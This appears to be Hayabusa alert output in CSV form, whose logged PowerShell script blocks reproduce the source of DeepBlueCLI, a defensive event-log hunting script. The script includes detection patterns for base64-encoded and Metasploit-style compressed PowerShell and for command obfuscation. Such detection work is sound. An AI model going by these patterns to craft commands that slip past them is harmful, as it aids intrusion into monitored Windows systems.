state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logna",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logna",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"me=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"me=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.262 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.265 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" 